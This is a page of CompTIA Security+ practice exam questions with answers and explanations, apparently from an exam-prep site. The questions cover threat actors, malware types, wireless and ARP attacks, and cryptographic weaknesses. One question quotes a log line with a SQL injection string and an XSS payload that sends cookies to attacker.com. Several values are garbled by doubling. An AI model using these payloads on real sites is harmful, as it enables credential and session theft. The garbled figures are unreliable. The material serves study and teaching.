Threats, Vulnerabilities, and Mitigations

490 soru

Soru 321Soru

During an investigation at a regional power grid operator, incident responders uncover an adversary that maintained persistent, undetected access across internal control networks for over nine months. The adversary utilized customized living-off-the-land techniques to exfiltrate SCADA architecture diagrams and operational telemetry while intentionally avoiding ransomware deployment or disruptive activity. Which of the following threat actor types and attribute profiles best aligns with this behavior?

Cevabı ve açıklamayı göster

Cevap: Nation-state threat actor characterized by high sophistication, long-term strategic motivation, and extensive resource funding.

Cevap

Nation-state threat actor characterized by high sophistication, long-term strategic motivation, and extensive resource funding.
The correct option correctly attributes the threat activity to a nation-state actor. Prolonged, covert access combined with sophisticated living-off-the-land techniques and targeted exfiltration of critical infrastructure telemetry indicates a well-funded, highly sophisticated threat actor motivated by strategic intelligence gathering.

Adım Adım Çözüm

1
Analyze the adversary's tactics, techniques, and procedures (TTPs) described in the scenario.
Identified nine months of undetected persistence, living-off-the-land techniques, and zero destructive payload execution.
Tactical restraint and stealth reflect advanced operational discipline and sophisticated capabilities.
2
Evaluate the targeted assets and primary objective.
Targeted SCADA architecture diagrams and operational telemetry for exfiltration.
Exfiltrating critical infrastructure blueprints aligns with strategic espionage rather than immediate financial extortion or ideological vandalism.
3
Map the observed attributes (sophistication, funding, intent, persistence) to threat actor classifications.
Nation-state actors are the primary group with the resource level, patience, and strategic intent to conduct prolonged intelligence collection against critical infrastructure.
Matching attributes and motivations correctly distinguishes nation-state APTs from criminal or hacktivist entities.

Anahtar Kavram

Threat Actor Attributes and Intent Alignment
Tahmini Süre:1m 30s
Soru 322Soru

A security analyst investigates application logs following an intrusion alert on a customer-facing portal and identifies two distinct HTTP request strings executed in rapid succession:

text
GET /search.php?item=102%20UNION%20SELECT%20username,password_hash%20FROM%20accounts-- HTTP/1.1
POST /feedback.php HTTP/1.1
Host: portal.example.com
Content-Type: application/x-www-form-urlencoded

comment=<script>document.location='http://attacker.com/steal?c='+document.cookie</script>

Based on the log evidence provided, which of the following software remediations must the development team implement to eliminate these specific application vulnerabilities? (Select TWO.)

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: Enforce parameterized SQL queries and prepared statements within the database abstraction layer for search queries.; Apply contextual HTML entity output encoding to user-supplied input prior to rendering it within the web application interface.

Cevap

The correct remediations are implementing parameterized SQL queries (prepared statements) to mitigate the SQL injection vulnerability and utilizing contextual output encoding to neutralize the Cross-Site Scripting (XSS) attack.
The logs reflect two classic web application attack vectors: SQL Injection (manipulating backend database logic via unvalidated parameters) and Cross-Site Scripting (injecting malicious client-side scripts into web pages). The proper software development remedies are parameterized database queries (prepared statements) to isolate parameter inputs from SQL syntax, and contextual output encoding to prevent user-controlled scripts from executing inside the victim's browser.

Adım Adım Çözüm

1
Analyze the first HTTP request GET payload string
The string contains SQL keywords (`UNION SELECT`) and comment delimiters (`--`), indicating a classic SQL Injection (SQLi) attack aimed at database extraction.
Identify the specific flaw type affecting database interaction.
2
Analyze the second HTTP request POST body payload string
The string contains JavaScript elements (`<script>` tag targeting `document.cookie`), indicating a Cross-Site Scripting (XSS) attack aimed at cookie theft.
Identify the client-side execution flaw type affecting user browser execution.
3
Select targeted developer remedies for each identified vulnerability class
Prepared statements prevent SQL structure alteration by binding inputs as data, while output encoding prevents the web browser from interpreting user inputs as executable HTML/JS instructions.
Match software vulnerability remediation standards to verified attack vectors.

Anahtar Kavram

Application Input Validation and Output Encoding Mitigations
Soru 323Soru

During an enterprise incident response triage, security engineers analyze a compromised domain controller demonstrating unauthorized administrative activity. Diagnostics reveal that the attack payload was injected directly into system RAM using a legitimate administrative utility, executing strictly in volatile memory without writing any standalone binary file to the host hard drive. Which of the following malware classifications best describes this type of threat?

Cevabı ve açıklamayı göster

Cevap: Fileless malware

Cevap

Fileless malware
Fileless malware executes directly within volatile system memory (RAM) or piggybacks on legitimate host tools (such as PowerShell or WMI) without writing binary files to the storage drive, making traditional signature-based disk scans ineffective.

Adım Adım Çözüm

1
Analyze the technical indicators provided in the incident log scenario.
Identified that the payload resides and executes strictly within system volatile RAM and leaves no standalone binary artifacts on disk.
Understanding the persistence and storage medium helps classify the malware category.
2
Compare observed Indicators of Compromise (IoCs) against standard malware taxonomy definitions.
Malware that operates entirely in memory or leverages native system tools without leaving traditional file footprint matches the fileless malware classification.
Fileless attacks evade standard disk-based anti-virus signatures by avoiding traditional executable writes.

Anahtar Kavram

Fileless Malware Execution and Volatile Memory Indicators
Soru 324Soru

During an internal security audit, an administrator identifies two host vulnerabilities on an enterprise web server: an unauthenticated REST API endpoint susceptible to directory traversal, and legacy SMB services accepting anonymous NULL session connections. Which TWO of the following remediation measures should the administrator implement to directly resolve these host and architecture vulnerabilities?

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: Apply software patches to enforce strict input sanitization and path validation on API parameters.; Disable legacy NULL session capabilities within the host operating system security configuration.

Cevap

The administrator must apply software patches for input sanitization and path validation, and disable legacy NULL sessions in the host operating system configuration.
Remediating host and architecture flaws requires addressing the root causes directly on the host system: validating and sanitizing API path inputs stops directory traversal, and hardening the host OS configuration by disabling NULL sessions prevents anonymous share and user enumeration.

Adım Adım Çözüm

1
Address the web application vulnerability.
Implementing path sanitization prevents directory traversal attacks from accessing sensitive files.
Vulnerabilities in software logic require direct code patches or sanitization routines on the host.
2
Address the host protocol vulnerability.
Disabling NULL sessions blocks anonymous IPC$ share enumeration on the server.
Hardening operating system configurations removes unauthenticated information disclosure vectors.

Anahtar Kavram

Host Hardening and Vulnerability Remediation
Soru 325Soru

Match each observed network or wireless attack indicator on the left with its corresponding attack classification on the right.

Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın

Öğeler

A rogue access point broadcasting the exact SSID of a corporate network to trick users into connecting
Excessive radio frequency signal noise causing high packet loss and sudden loss of wireless connectivity across a floor
A flood of spoofed 802.11 management frames instructing wireless client devices to disconnect from the network
Unsolicited Layer 2 responses associating the default gateway's IP address with an unauthorized MAC address

Eşleşmeler

Cevabı ve açıklamayı göster

Cevap

Rogue access point mimicking SSID matches Evil Twin; RF signal noise causing connectivity loss matches RF Jamming; Spoofed 802.11 management frames match Deauthentication Attack; Unsolicited Layer 2 responses matching gateway IP to unauthorized MAC matches ARP Poisoning.
Each indicator matches its respective attack mechanism directly: broadcasting a duplicate enterprise SSID represents an Evil Twin; physical RF spectrum noise represents RF Jamming; sending disassociation management packets represents a Deauthentication attack; and distributing forged IP-to-MAC mappings represents ARP Poisoning.

Adım Adım Çözüm

1
Analyze each network or wireless attack indicator in the left column.
Identify key characteristics: SSID spoofing, physical radio interference, 802.11 disassociation/deauthentication frames, and unsolicited MAC-to-IP cache updates.
Matching indicators requires recognizing the fundamental technical mechanism associated with each threat.
2
Pair each indicator with its respective threat classification.
Correlate rogue SSID broadcasting to Evil Twin, RF noise to RF Jamming, disconnect frames to Deauthentication, and ARP cache corruption to ARP Poisoning.
Each security threat leaves distinct Layer 1, Layer 2, or Layer 3 artifacts.

Anahtar Kavram

Network and Wireless Attack Indicators
Soru 326Soru

During a routine post-incident investigation at a commercial financial auditing firm, security engineers discover an intrusion originating from a compromised third-party software build pipeline. The attack exhibited high technical sophistication, stealthy persistence across multiple network segments, and extensive resource backing, with an operational focus on long-term corporate intelligence gathering rather than immediate financial extortion. Which threat actor profile best aligns with the operational attributes and attack vector observed in this scenario?

Cevabı ve açıklamayı göster

Cevap: State-sponsored threat group

Cevap

State-sponsored threat group
State-sponsored threat groups have the high technical capability, funding, and strategic intent necessary to execute complex supply chain compromises for long-term cyber espionage.

Adım Adım Çözüm

1
Analyze the attack vector identified in the scenario
The intrusion entered through a third-party software build pipeline (supply chain vector).
Identifying the vector helps narrow down the sophistication and positioning required by the adversary.
2
Evaluate adversary attributes and motivation
High technical sophistication, stealthy persistence, significant financial backing, and intelligence-gathering motivation.
These attributes align directly with advanced persistence capabilities typical of nation-state actors.
3
Match attributes to threat actor classification
State-sponsored threat group is the only profile matching high sophistication, espionage intent, and supply chain attack capabilities.
Other threat actor profiles lack either the required sophistication, resources, or strategic motivation.

Anahtar Kavram

Threat Actor Attributes and Attack Vectors
Soru 327Soru

A network administrator inspecting wireless event logs discovers that multiple client devices are repeatedly and abruptly losing connectivity to the enterprise access point. The logs reveal a flood of unencrypted 802.11 management packets sent with the MAC address of the access point, instructing the clients to immediately terminate their session. Which of the following wireless attack types is indicated by these log entries?

Cevabı ve açıklamayı göster

Cevap: Deauthentication attack

Cevap

Deauthentication attack
The correct answer is the deauthentication attack. In 802.11 wireless networks, deauthentication frames are management packets sent to notify a client station that its connection to an access point has been terminated. Because standard 802.11 management frames are unauthenticated and sent in cleartext, an attacker can spoof the source MAC address of the legitimate access point and broadcast continuous deauthentication frames, causing target client devices to lose their Wi-Fi connection.

Adım Adım Çözüm

1
Analyze the log indicators provided in the scenario.
The logs show a high volume of unencrypted 802.11 management packets commanding client devices to drop their connections.
Legacy 802.11 management frames are unauthenticated, allowing an attacker to spoof the access point's MAC address.
2
Correlate the packet indicators with the corresponding attack classification.
Broadcasting malicious management frames to force client disconnection defines a deauthentication attack.
Attackers leverage deauthentication frames to perform denial-of-service or to force clients to reconnect to an Evil Twin access point.

Anahtar Kavram

Wireless Deauthentication Attack Indicators
Soru 328Soru

An application security engineer analyzes transaction execution traces and thread dumps from a multi-threaded microservice responsible for handling account withdrawals. The application verifies an account's available funds prior to deducting the balance and completing the transfer. During high-concurrency peak load testing, automated monitoring detects instances where account balances drop below zero despite validation checks executing successfully without failure. Code analysis confirms that the check and the update operations are executed as non-atomic statements across separate database connections. Which of the following vulnerabilities is demonstrated in this scenario?

Cevabı ve açıklamayı göster

Cevap: Time-of-check to time-of-use (TOCTOU) race condition

Cevap

Time-of-check to time-of-use (TOCTOU) race condition
The correct option correctly identifies the vulnerability as a Time-of-Check to Time-of-Use (TOCTOU) race condition. TOCTOU occurs when a program checks the state of a resource (e.g., account balance) and then acts upon that resource (e.g., executing a withdrawal), but the state changes in the time window between checking and acting due to concurrent execution threads.

Adım Adım Çözüm

1
Analyze the observed system behavior described in the scenario logs.
Identified that validation passes before execution, but state changes occur concurrently under high thread volume.
Understanding why checks pass despite invalid final state points directly to timing gaps.
2
Evaluate the relationship between the validation check and the execution operation.
Determined that the verification (time-of-check) and modification (time-of-use) are non-atomic and exposed to race conditions.
Non-atomic operations across asynchronous or concurrent threads allow state manipulation in the window between check and execution.
3
Select the vulnerability classification matching timing-dependent state flaws.
Confirmed the flaw as a Time-of-Check to Time-of-Use (TOCTOU) race condition.
TOCTOU explicitly describes vulnerability windows created between system condition verification and resource access.

Anahtar Kavram

Time-of-Check to Time-of-Use (TOCTOU) and Concurrency Vulnerabilities
Tahmini Süre:2m 0s
Soru 329Soru

Match each observed security incident technical indicator on the left with its corresponding malware classification on the right.

Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın

Öğeler

A scheduled task executing an obfuscated script creates an unauthorized persistent administrator account.
Direct Kernel Object Manipulation (DKOM) modifies active operating system data structures to conceal running processes.
Automated network sweeps over TCP port 445 exploit SMB vulnerabilities to self-replicate payload code to adjacent hosts.
A dormant script executes a malicious routine only when a target enterprise database table exceeds 100,000 records.

Eşleşmeler

Cevabı ve açıklamayı göster

Cevap

The scheduled task creating persistent access matches Trojan; kernel memory manipulation to hide processes matches Rootkit; automated port 445 network propagation matches Worm; and environmental trigger execution matches Logic Bomb.
Each indicator aligns with a distinct technical behavior: kernel cloaking via DKOM signifies a Rootkit; autonomous network scanning and SMB exploitation signifies a Worm; pre-configured conditional triggering signifies a Logic Bomb; and hidden persistence via routine operating system utilities signifies a Trojan.

Adım Adım Çözüm

1
Analyze item 1 regarding scheduled task obfuscated scripts creating unauthorized accounts.
Identified as a Trojan.
Trojans masquerade as or leverage legitimate functionality to secretly introduce unauthorized capabilities.
2
Analyze item 2 regarding Direct Kernel Object Manipulation (DKOM).
Identified as a Rootkit.
Rootkits operate at kernel privilege levels to alter system structures and mask processes.
3
Analyze item 3 regarding port 445 scanning and self-replication.
Identified as a Worm.
Worms propagate autonomously across network vulnerabilities without requiring user action.
4
Analyze item 4 regarding execution dependent on database record thresholds.
Identified as a Logic Bomb.
Logic bombs trigger malicious execution based on specific operational or logical events.

Anahtar Kavram

Distinguishing technical indicators of compromise across fundamental malware classifications.
Soru 330Soru

During an incident investigation on an enterprise wired subnet, a security analyst reviews endpoint logs and network traffic captures. The log entries reveal that the MAC address bound to the default gateway IP address (10.20.1.110.20.1.1) is rapidly oscillating between the legitimate router physical address (00:11:22:33:44:5500:11:22:33:44:55) and an unknown physical address (00:AA:BB:CC:DD:EE00:AA:BB:CC:DD:EE). This address flipping is accompanied by a continuous flood of unsolicited Gratuitous ARP reply packets broadcast across the local segment. Which of the following network attacks is currently taking place?

Cevabı ve açıklamayı göster

Cevap: ARP cache poisoning

Cevap

ARP cache poisoning is occurring because unsolicited Gratuitous ARP reply packets are corrupting the Layer 2 resolution tables of hosts by repeatedly re-mapping the gateway IP to an unauthorized MAC address.
The correct answer identifies ARP cache poisoning. In an ARP cache poisoning (ARP spoofing) attack, an adversary sends forged, unsolicited Gratuitous ARP reply messages across a local area network. Neighboring endpoints parse these replies and update their local ARP caches, overwriting the legitimate default gateway MAC address (00:11:22:33:44:5500:11:22:33:44:55) with the attacker's MAC address (00:AA:BB:CC:DD:EE00:AA:BB:CC:DD:EE). This enables an On-Path (Man-in-the-Middle) attack by routing all external client traffic through the attacker's host.

Adım Adım Çözüm

1
Analyze the observed log indicators and traffic patterns
Identified rapid flipping of the MAC address assigned to gateway IP 10.20.1.110.20.1.1 alongside an influx of unsolicited Gratuitous ARP replies.
The Address Resolution Protocol (ARP) translates Layer 3 IP addresses into Layer 2 physical MAC addresses for local subnet delivery.
2
Correlate packet activity with specific attack mechanisms
Recognized that Gratuitous ARP replies cause receiving hosts to update their ARP cache tables immediately without having sent a preceding ARP request.
Attackers exploit this protocol feature to overwrite existing ARP cache entries and intercept outbound subnet traffic.
3
Differentiate the attack from related network threats
Confirmed that the primary indicator (ARP table mapping corruption via Gratuitous ARP) uniquely defines ARP cache poisoning (ARP spoofing).
MAC flooding targets switch infrastructure memory tables, while DNS poisoning alters domain-name-to-IP lookup services.

Anahtar Kavram

ARP Cache Poisoning and Gratuitous ARP Indicators
Soru 331Soru

During a security audit, system administrators discover an unapproved executable file residing on a database server. Technical analysis reveals that the executable monitors system performance and remains inactive until the database reaches exactly 1000010{}000 records, at which point it automatically executes a script to purge system audit logs. Which of the following malware classifications best describes this threat?

Cevabı ve açıklamayı göster

Cevap: Logic bomb

Cevap

Logic bomb
The correct answer is the choice identifying a logic bomb. A logic bomb is a piece of code intentionally inserted into a software system that remains dormant until specific logical conditions—such as reaching a specified number of database records, a specific timestamp, or an account status change—are met.

Adım Adım Çözüm

1
Analyze the operational behavior of the discovered malware.
The malware remains dormant until a specific condition (1000010{}000 database records) is satisfied.
Identifying the execution mechanism differentiates conditional execution from self-propagation or user trickery.
2
Evaluate the trigger condition against malware characteristics.
A payload programmed to fire when precise environmental or logical criteria are met defines a logic bomb.
Logic bombs execute automatically upon predefined event thresholds.

Anahtar Kavram

Logic Bomb Characteristics
Tahmini Süre:1m 15s
Soru 332Soru

An enterprise systems administrator is performing a security posture review of host operating systems, network services, and infrastructure hardware. Match each host, network, or architecture vulnerability to its corresponding primary risk or operational impact.

Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın

Öğeler

Resource Exhaustion via Memory Leak
Unsupported or End-of-Life (EOL) Host System
Unnecessary Open Ports and Unused Services
Out-of-Band Management Controller Misconfiguration

Eşleşmeler

Cevabı ve açıklamayı göster

Cevap

Resource Exhaustion via Memory Leak matches with RAM continuously allocated without release causing instability; Unsupported/EOL Host System matches with security patches no longer provided by the vendor; Unnecessary Open Ports matches with active listening daemons running without requirement broadening attack surface; Out-of-Band Controller Misconfiguration matches with default credentials and unencrypted protocols enabled on hardware interfaces.
Each vulnerability directly pairs with its core operational impact: memory leaks exhaust host system memory; end-of-life status deprives systems of vendor updates; unnecessary listening ports expand the host attack surface; and out-of-band management misconfigurations expose hardware interfaces through weak access controls.

Adım Adım Çözüm

1
Analyze host resource management failure indicators.
Identify that progressive, unreleased RAM usage leading to application crash defines a memory leak resource exhaustion condition.
Software that fails to clean up allocated memory consumes finite system memory pools over time.
2
Evaluate lifecycle security risks for legacy host operating systems.
Determine that end-of-life systems lack vendor patch support, leaving exposed flaws unmitigated.
When software reaches end-of-life status, vendor engineering teams cease issuing security advisories and security updates.
3
Examine host attack surface management concepts.
Recognize that running unnecessary services leaves open ports active, expanding host exposure.
Disabling unused services and closing unneeded ports is a fundamental host-hardening practice to minimize entry vectors.
4
Assess hardware infrastructure management vulnerabilities.
Associate out-of-band management controllers with default credential and unencrypted access weaknesses.
Baseboard management controllers operate independently of host operating systems and require strict access controls.

Anahtar Kavram

Host, Network, and Architecture Vulnerabilities
Tahmini Süre:1m 30s
Soru 333Soru

An organization is updating its internal web application architecture to prevent eavesdropping and data tampering across internal subnets. A network team member suggests omitting TLS encryption for internal microservice communications, arguing that existing perimeter firewalls and isolated VLANs make the internal network inherently safe from interception. Which security control weakness is demonstrated by this proposed architecture?

Cevabı ve açıklamayı göster

Cevap: Implicit trust based on network perimeter boundary

Cevap

Implicit trust based on network perimeter boundary
The correct answer accurately identifies the design weakness of trusting traffic based on network location. Modern security principles mandate that data in transit be protected with encryption regardless of whether it originates inside or outside a network boundary.

Adım Adım Çözüm

1
Analyze the scenario proposed by the network team member
The proposal advocates omitting end-to-end transport layer encryption (TLS) internally because perimeter firewalls and VLANs exist.
Identifying the root assumption reveals where the security model fails.
2
Evaluate the architectural assumption against security control standards
Assuming internal networks are secure solely because of physical or logical network boundaries creates an unencrypted internal environment vulnerable to lateral movement and packet sniffing.
Effective security controls require continuous verification and encryption regardless of network location.

Anahtar Kavram

Perimeter Reliance vs. Zero Trust Architecture
Tahmini Süre:1m 30s
Soru 334Soru

Match each observed technical indicator from packet captures and system logs to its corresponding network or wireless attack classification.

Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın

Öğeler

Frame captures reveal 802.1Q tagged traffic originating from an access port containing nested outer VLAN ID 10 and inner VLAN ID 20 headers.
Network logs show an unauthorized device responding to client broadcast DHCPDISCOVER messages with DHCP Option 3 pointing to a rogue gateway address.
Packet inspection reveals unsolicited OBEX protocol transactions establishing an unauthenticated wireless connection to extract contact lists from a mobile device.
Audit logs indicate an anomalous propagation delay during ISO 14443 challenge-response authentication while exchanging credentials between a physical badge and an access control reader.

Eşleşmeler

Cevabı ve açıklamayı göster

Cevap

VLAN double tagging frames correspond to VLAN Hopping; unauthorized gateway options in DHCP responses correspond to a Rogue DHCP Server Attack; unauthorized OBEX data extraction over Bluetooth corresponds to Bluesnarfing; anomalous ISO 14443 timing delays correspond to an RFID/NFC Relay Attack.
Each indicator uniquely aligns with its attack mechanism: nested 802.1Q headers represent Double Tagging VLAN Hopping; rogue default gateway assignments via DHCP Option 3 represent Rogue DHCP deployment; unauthorized data exfiltration via Bluetooth OBEX represents Bluesnarfing; and timing anomalies in ISO 14443 smart card authentication indicate an RFID/NFC Relay Attack.

Adım Adım Çözüm

1
Analyze frame encapsulation logs for 802.1Q tags.
Multiple nested 802.1Q VLAN headers sent from an access port demonstrate an exploitation of switch native VLAN tag stripping, which is characteristic of double tagging VLAN hopping.
Switches strip the outer native VLAN tag and forward the frame with the inner tag to another targeted VLAN without validating access rules.
2
Examine DHCP protocol interaction logs.
Unauthorized answers offering network configuration parameters (Option 3 for Default Gateway) point to a Rogue DHCP Server.
Attackers place rogue DHCP servers on a segment to redirect default gateway traffic to an attacker-controlled address for man-in-the-middle operations.
3
Evaluate wireless short-range data exchange protocol logs.
Unsolicited access using OBEX Push profile to download internal device memory (contacts) characterizes Bluesnarfing.
Bluesnarfing targets Bluetooth vulnerabilities to steal confidential information, unlike Bluejacking which only transmits unwanted messages.
4
Inspect physical security proximity credential timing logs.
Propagation delays during ISO 14443 contactless smart card challenge-responses signal an intermediary proxying the signal, defining a Relay Attack.
Relay attacks transmit contactless RFID/NFC RF signals over secondary channels, introducing measurable latency into proximity validation protocols.

Anahtar Kavram

Network and Wireless Attack Indicators
Tahmini Süre:2m 0s
Soru 335Soru

An endpoint detection and response telemetry report identifies an unapproved background process establishing persistence via a scheduled task named SystemHealthCheck. Memory inspection confirms the payload performs API hooking into explorer.exe to capture user credentials typed into web browsers and collect window titles, while establishing encrypted outbound connections to an external command-and-control server. Which of the following technical characteristics and malware classifications directly align with this observed incident? (Select TWO.)

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: Spyware performing credential harvesting and active user activity monitoring; Persistence mechanism utilization via host system scheduling utilities

Cevap

The correct responses are the option identifying spyware credential harvesting and monitoring, and the option identifying persistence via scheduling utilities.
The scenario details keylogging and telemetry collection through API hooking in explorer.exe, which is characteristic of spyware. Additionally, using scheduled tasks to ensure execution across reboots represents host persistence.

Adım Adım Çözüm

1
Analyze the observed host telemetry capabilities.
Process memory hooking into explorer.exe to log keystrokes and capture application window titles maps directly to spyware and keylogger malware functionality.
Spyware gathers sensitive user input and telemetry silently without user authorization.
2
Identify host-level persistence indicators.
The creation of a OS scheduled task (SystemHealthCheck) ensures ongoing execution across system reboots.
Scheduled tasks are standard persistence vectors used by malware to survive system restart.
3
Evaluate and rule out incorrect malware classifications and remediation controls.
The telemetry does not demonstrate self-replicating subnet scanning (worm behavior), nor can an inline network firewall mitigate internal host memory injection.
Differentiating malware behavior and matching appropriate host endpoint controls prevents misdiagnosis.

Anahtar Kavram

Spyware Indicators of Compromise and Host Persistence
Soru 336Soru

A security analyst at a global hospitality enterprise discovers an unauthorized remote access tool installed on point-of-sale systems across multiple properties. Investigation reveals that an external adversary gained initial access using compromised credentials from a third-party vendor to deploy custom malware specifically designed to harvest credit card data for long-term monetary profit. Based on these observed attributes, which threat actor type and primary motivation best describe this adversary?

Cevabı ve açıklamayı göster

Cevap: Organized crime motivated by financial gain

Cevap

Organized crime motivated by financial gain
The correct answer accurately identifies organized crime motivated by financial gain. Organized cybercrime syndicates typically target financial instruments, point-of-sale infrastructure, and credit card numbers using external attack vectors (such as compromised supply chain credentials) to generate illicit revenue.

Adım Adım Çözüm

1
Analyze the attack vector and access method
The intrusion originated externally via stolen third-party vendor credentials, indicating an external adversary rather than an insider.
Threat actors are categorized by their origin point (internal vs. external) and vector of entry.
2
Evaluate the primary objective and target asset
The target was point-of-sale financial data specifically collected for monetary monetization.
Adversary intent directly maps to threat actor classifications and profile attributes.
3
Correlate attributes to threat actor profiles
External origin, sophisticated target selection (POS systems), and financial motivation directly match the profile of organized cybercrime groups.
Organized crime threat actors systematically seek financial exfiltration using well-resourced tools.

Anahtar Kavram

Threat Actor Profiling and Attributes
Soru 337Soru

A security engineer auditing an enterprise cloud microservices environment identifies two specific architectural design choices: internal microservice-to-microservice traffic relies solely on network IP address allowlists without identity verification, and database backup files are encrypted using AES operating in Electronic Codebook (ECB) mode. Which of the following statements correctly describe the cryptographic and security control weaknesses present in this environment? (Select TWO.)

Geçerli olan tümünü seçin

Cevabı ve açıklamayı göster

Cevap: Electronic Codebook (ECB) mode encrypts identical plaintext blocks into identical ciphertext blocks, preserving structural data patterns in the encrypted output.; Exclusive reliance on IP address allowlists relies on perimeter network location rather than cryptographic identity, violating Zero Trust continuous verification principles.

Cevap

The weaknesses are that Electronic Codebook (ECB) mode reveals structural data patterns because identical plaintext blocks produce identical ciphertext blocks, and exclusive reliance on IP allowlists creates an outdated perimeter trust model that violates Zero Trust architecture principles.
The correct statements correctly identify the core weaknesses of ECB mode and implicit network trust. ECB mode encrypts identical plaintext blocks into identical ciphertext blocks because it lacks initialization vectors or chaining mechanism, exposing patterns in stored database files. Furthermore, relying solely on IP allowlists creates an implicit perimeter trust model, failing to enforce Zero Trust principles such as mutual TLS (mTLS) authentication and continuous verification.

Adım Adım Çözüm

1
Analyze the cryptographic cipher mode flaw (AES-ECB).
Identified that ECB lacks initialization vectors and block chaining, meaning identical 128-bit plaintext blocks yield identical ciphertext blocks, leaking structural information.
Cryptographic modes like CBC or GCM must be used for confidentiality and data pattern hiding.
2
Analyze the access control weakness (IP allowlisting without mutual authentication).
Identified that trusting requests based on IP address alone assumes network position implies legitimacy.
Modern enterprise security requires Zero Trust architecture (ZTA) where identity is explicitly validated regardless of network location.

Anahtar Kavram

Cryptographic Block Cipher Modes and Zero Trust Access Control Weaknesses
Soru 338Soru

A system administrator notices that several virtualized database servers are experiencing sustained 100% CPU utilization during off-peak hours. Outbound network logs show persistent, encrypted connections on TCP port 3333 transmitting data structured with the Stratum communication protocol. An endpoint inspection reveals an unauthorized process masquerading as a system executable (`svchost.exe`) running under a compromised service account. Which of the following malware types is most likely responsible for this activity?

Cevabı ve açıklamayı göster

Cevap: Cryptominer

Cevap

Cryptominer
The combination of sustained maximum CPU utilization, process disguise via spoofed system executable names (`svchost.exe`), and outbound network traffic using the Stratum mining protocol specifically defines cryptomining malware (cryptojacking).

Adım Adım Çözüm

1
Analyze resource utilization indicators
Identify sustained 100% CPU usage during off-peak hours, pointing to intensive processing tasks.
Cryptocurrency mining algorithms rely heavily on system hardware resource consumption.
2
Evaluate network telemetry protocol artifacts
Confirm outbound traffic using the Stratum mining protocol on TCP port 3333.
Stratum is the standard protocol for mining pool communication.
3
Synthesize indicators to classify malware type
Match high CPU load and Stratum pool communications to a unauthorized cryptominer masquerading as a legitimate Windows system process.
Cryptojacking malware frequently hides behind system process names while consuming hardware resources.

Anahtar Kavram

Cryptominer / Cryptojacking Indicators of Compromise
Soru 339Soru

During a routine security assessment of hypervisor hosts in an enterprise data center, a security analyst reviews the following vulnerability scan report snippet:

Host: 192.168.42.15
Port: 427/TCP, 427/UDP
Service: Service Location Protocol (SLP)
Vulnerability: Remote Code Execution via Pre-Authentication Heap Overflow
CVSS Score: 9.8 (Critical)
Summary: Unauthenticated remote users can execute arbitrary code with root privileges on the hypervisor host by sending crafted SLP requests.

Which of the following network architecture and host hardening controls represents the MOST effective immediate remediation to eliminate this exposure without disrupting guest virtual machine operations?

Cevabı ve açıklamayı göster

Cevap: Disable the SLP service on the hypervisor host and isolate the management interface within a dedicated out-of-band management VLAN.

Cevap

Disable the SLP service on the hypervisor host and isolate the management interface within a dedicated out-of-band management VLAN.
Disabling the vulnerable SLP service directly eliminates the pre-authentication root exploit vector on the host. Restricting management access to an out-of-band management VLAN enforces network segmentation so that hypervisor administration is isolated from general network segments and guest VM traffic.

Adım Adım Çözüm

1
Analyze the vulnerability report to identify the target service and layer.
The target is port 427 (Service Location Protocol - SLP) running natively on the hypervisor management operating system, permitting pre-authentication root-level execution.
Identifying the affected component determines whether host-level or application-level mitigations are required.
2
Evaluate remediation options for host service exposure.
Disabling the vulnerable host daemon (SLP) removes the attack surface directly, and restricting access via a dedicated out-of-band VLAN prevents unauthorized internal reachability.
Disabling unnecessary host services and implementing microsegmentation/VLAN isolation are core host hardening and network architecture best practices.

Anahtar Kavram

Host Service Hardening and Out-of-Band Management Architecture
Soru 340Soru

A financial enterprise archives encrypted network packet captures of client communications for long-term compliance auditing. During a security review, an analyst notes that the legacy web application server is configured to prioritize static RSA key exchange cipher suites (such as TLS_RSA_WITH_AES_256_GCM_SHA384). If an adversary obtains the server's private key at a future date, which of the following security control weaknesses poses the greatest threat to the archived data?

Cevabı ve açıklamayı göster

Cevap: Lack of perfect forward secrecy, enabling retroactive decryption of recorded sessions

Cevap

Lack of perfect forward secrecy, enabling retroactive decryption of recorded sessions
In static RSA key exchange cipher suites, the client encrypts the pre-master secret with the server's public key. If an attacker records the encrypted traffic and later gains access to the server's private key, they can decrypt the pre-master secret and derive the session key for every archived session. Implementing cipher suites that support Perfect Forward Secrecy (PFS)—such as those using Ephemeral Elliptic Curve Diffie-Hellman (ECDHE)—ensures that a compromised long-term private key cannot be used to decrypt past communications.

Adım Adım Çözüm

1
Analyze the cipher suite specification
Identified the use of standard RSA key exchange (TLS_RSA_WITH_AES_256_GCM_SHA384) without ephemeral Diffie-Hellman key exchange (DHE/ECDHE).
Static RSA key exchange relies directly on the server's static private key to encrypt or exchange secret session material.
2
Evaluate the risk of private key compromise against recorded traffic
Determined that possessing the server's static private key allows deriving the master secret for any recorded handshake using that key.
Without Perfect Forward Secrecy (PFS), session keys are mathematically linked to the long-term private key.
3
Identify the required cryptographic control
Selected Perfect Forward Secrecy (PFS) via ephemeral Diffie-Hellman key agreement (e.g., ECDHE) as the necessary mitigation.
PFS generates unique, temporary session keys for each connection that cannot be derived retroactively even if the long-term server key is compromised.

Anahtar Kavram

Perfect Forward Secrecy (PFS) and Cipher Suite Weaknesses
ÖncekiSayfa 17 / 25Sonraki
Threats, Vulnerabilities, and Mitigations Alıştırma Soruları — CompTIA Security+ — Sayfa 17 | Examkin